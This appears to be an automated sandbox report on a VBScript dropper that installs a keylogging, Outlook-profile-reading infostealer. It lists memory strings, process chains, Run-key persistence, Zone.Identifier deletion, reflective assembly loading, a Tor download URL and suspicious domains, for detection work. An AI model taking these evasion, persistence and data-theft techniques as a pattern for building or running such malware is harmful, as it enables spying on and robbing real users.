                      Source: anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y
                      Source: anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
                      Source: anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
                      Source: anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/fi-fj
                      Source: anyname.exe, 00000001.00000003.305479835.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305305998.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304935196.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305193401.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305379502.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304993341.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305244460.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305125471.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305058733.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/j
                      Source: anyname.exe, 00000001.00000003.303718023.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303741179.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304935196.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305193401.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304993341.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305244460.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305125471.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305058733.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/N
                      Source: anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/u
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.301360086.0000000005392000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304620293.0000000005383000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: anyname.exe, 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.825746785.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://pZXqS7KWMFA4rh4s.net
                      Source: jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpString found in binary or memory: https://pZXqS7KWMFA4rh4s.net$
                      Source: anyname.exe, 00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmp, anyname.exe, 00000006.00000002.818827980.0000000000402000.00000040.00000001.sdmp, anyname.exe, 00000006.00000000.333358376.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 0000000A.00000002.421939439.0000000003C69000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000E.00000002.437781088.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 0000000E.00000000.412466130.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 00000010.00000002.437858484.0000000003819000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000000.432184199.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 00000012.00000000.429637125.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: anyname.exe, 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: mail.gnvmetalica.pe

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\anyname.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 6.0.anyname.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007bF4C6BC43u002d451Du002d4C27u002dA83Au002d8385F6B71886u007d/u0033EB7A67Cu002d4401u002d43FCu002d899Bu002dD2C8FBEB686A.csLarge array initialization: .cctor: array initializer size 11957
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_014D46A06_2_014D46A0
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_014D3D506_2_014D3D50
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_014D46306_2_014D4630
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_014D46906_2_014D4690
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_014DDA016_2_014DDA01
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_0530E2386_2_0530E238
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_0530ACF86_2_0530ACF8
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_06146C706_2_06146C70
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_061494F86_2_061494F8
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_061475406_2_06147540
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_061469286_2_06146928
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_067B16E86_2_067B16E8
                      Source: TGFTR.vbsInitial sample: Strings found which are bigger than 50
                      Source: anyname.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: jNnIJrO.exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: TGFTR.vbsReversingLabs: Detection: 39%
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\TGFTR.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe "C:\Users\user\AppData\Local\Temp\anyname.exe"
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe "C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe"
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe "C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe"
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe "C:\Users\user\AppData\Local\Temp\anyname.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\anyname.exe.logJump to behavior
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\anyname.exeJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@17/7@4/1
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\TGFTR.vbs"
                      Source: 6.0.anyname.exe.400000.10.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 6.0.anyname.exe.400000.10.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                      Data Obfuscation:

                      barindex
                      VBScript performs obfuscated calls to suspicious functionsShow sources
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: \AppData\Local\Temp\anyname.exe", "2");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\anyname.exe")
                      .NET source code contains potential unpackerShow sources
                      Source: anyname.exe.0.dr, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.anyname.exe.10000.0.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.2.anyname.exe.10000.0.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.anyname.exe.1a0000.2.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.anyname.exe.1a0000.1.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.anyname.exe.1a0000.3.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.anyname.exe.1a0000.0.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.2.anyname.exe.1a0000.0.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.anyname.exe.150000.3.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.anyname.exe.150000.0.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.2.anyname.exe.150000.0.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.anyname.exe.150000.1.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.anyname.exe.150000.2.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.anyname.exe.190000.3.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.anyname.exe.190000.0.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.anyname.exe.190000.2.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.anyname.exe.190000.1.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.anyname.exe.190000.0.unpack, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: jNnIJrO.exe.6.dr, Windows/MainForm.cs.Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 1_2_00016EE0 push cs; retf 1_2_00016F1A
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 3_2_001A6EE0 push cs; retf 3_2_001A6F1A
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 4_2_00156EE0 push cs; retf 4_2_00156F1A
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 5_2_00196EE0 push cs; retf 5_2_00196F1A
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_00A06EE0 push cs; retf 6_2_00A06F1A
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_06148540 push es; ret 6_2_06148550
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeCode function: 10_2_00756EE0 push cs; retf 10_2_00756F1A
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.96488968288
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.96488968288
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeFile created: C:\Users\user\AppData\Local\Temp\tmpG259.tmp (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeFile created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeJump to dropped file
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\anyname.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jNnIJrOJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jNnIJrOJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeFile opened: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
